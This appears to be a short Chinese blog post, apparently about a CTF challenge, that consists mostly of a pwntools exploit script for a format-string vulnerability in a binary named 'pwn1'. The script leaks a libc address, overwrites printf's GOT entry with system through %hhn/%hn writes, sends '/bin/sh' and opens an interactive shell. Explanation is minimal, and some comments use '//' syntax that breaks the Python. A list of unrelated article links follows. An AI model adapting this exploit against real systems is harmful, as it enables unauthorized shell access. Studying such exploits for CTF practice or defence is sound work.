exp分析
2024-09-29 14:08:29
1 from pwn import*
2
3 local =1
4 debug = 1
5
6 if local:
7 p = process('./pwn1')
8 else:
9 p = remote("127.0.0.1",8080)
10
11 #context.log_level = 'debug'
12 '''
13 if debug:
14 gdb.attach(p)
15 '''
16 def fms(data):
17 p.recvuntil("input$",timeout=4)
18 p.sendline("")
19 p.recvuntil("please input your name:\n")
20 p.sendline(data)
21
22
23 libc = ELF("/lib/i386-linux-gnu/libc.so.6")
24 elf = ELF('./pwn1')
25
26 fms('%35$p')
27
28 libc_start_main_addr = int(p.recv(10),16) - 243 #__libc_start_main//?
29 libc_addr = libc_start_main_addr - libc.symbols['__libc_start_main']//?
30 print "libc_addr =",hex(libc_addr)
31
32 printf_got = elf.got['printf']//got表地址
33 print "printf_got =",hex(printf_got)
34
35 system_addr =libc_addr + libc.symbols['system']//symbols['system']函数地址
36 print "system_addr =",hex(system_addr)
37 //ELF模块
38 #make stack
39 make_stack = 'a' * 0x30 + p32(printf_got) + p32(printf_got + 0x1)
40 fms(make_stack)
41 #gdb.attach(p)
42
43 payload = "%" + str(((system_addr & 0x000000FF))) + "x%18$hhn"
44 payload += "%" + str(((system_addr & 0x00FFFF00) >> 8) - (system_addr & 0x000000FF)) + "x%19$hn"
45 print "payload=",payload
46
47 fms(payload)
48 fms('/bin/sh\x00')
49 p.interactive()
最新文章
- Linq to object 技巧、用法集锦
- installation - How to install Synaptic Package Manager? - Ask Ubuntu
- .Net程序员学用Oracle系列(4):四个基本概念
- 顺序线性表之大整数求和C++
- dos命令窗口修改编码,CMD编码修改方法
- 201521123006 《java程序设计》 第13周学习总结
- Liunx vi编辑器一些指令
- powershell 监控, 重启网卡
- bzoj3598 [Scoi2014]方伯伯的商场之旅
- PHP生成图表pChart
- React Native基础&入门教程:以一个To Do List小例子,看props和state
- Pycharm 常用快捷键与设置
- java 发邮件
- 关于百度地图API和jqGrid踩到的坑
- 【转】C++ 11 并发指南一(C++ 11 多线程初探)
- python学习:数据类型
- Linux下常用工具
- linux下编写C++程序播放音频
- Flink - FlinkKafkaProducer010
- 使用WebClient下载网页,用正则匹配需要的内容